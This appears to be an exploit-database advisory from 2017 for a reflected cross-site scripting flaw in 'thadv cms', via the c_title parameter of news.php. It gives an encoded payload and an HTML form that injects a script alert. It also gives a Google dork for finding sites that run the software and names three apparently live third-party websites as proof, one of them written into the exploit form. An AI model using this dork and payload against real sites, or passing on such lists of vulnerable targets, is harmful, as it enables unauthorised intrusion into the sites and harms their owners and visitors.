==============================================
# Exploit Title : thadv cms Cross-Site Scripting(XSS/Reflected) vulnerability
# Reported Date : 8 - 22 - 2017
# Exploit Author : Ashiyane Digital Security Team
# Tested On : kali Linux
# Vendor Homepage : http://thadv.com
# Google Dork : intext:"Website designed by THADV"
==============================================
-----------------------------
vulnerability discovered by :
sir shahroukh
-----------------------------
vulnerability Path :
http://Target/news/news.php
-----------------------------
vulnerability File:
news.php
-----------------------------
vulnerability Method :
_POST[]
-----------------------------
vulnerability Variable:
c_title
-----------------------------
Vulnerability code :
<form method='POST' name='page1' action='news.php?
class1=&class2=&class3=&search=&
c_title=%5C%5C%5C%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&page='
target='_self'>共<span>0</span>頁 目前第<span>1
</span>頁 轉至第<INPUT size='1' name='page_input'>頁
<input type='submit' name='Submit3' value=' GO ' class='tj'>
</form>
-----------------------------
Exploit code :
<form method='POST' name='page1'
action='http://www.renshinkan.tw/news/news.php?class1=&class2=
&class3=&search=&c_title='/></title><script>alert(1)</script>&page='
target='_self'>共<span>0</span>頁 目前第<span>1</span>
頁 轉至第<INPUT size='1' name='page_input'>頁
<input type='submit' name='Submit3' value=' GO ' class='tj'>
</form>
-----------------------------
Proof :
http://www.renshinkan.tw/news/news.php
http://www.sanna.com.tw/news/news.php
http://www.letsgowithlasco.com/news/news.php
==============================================|
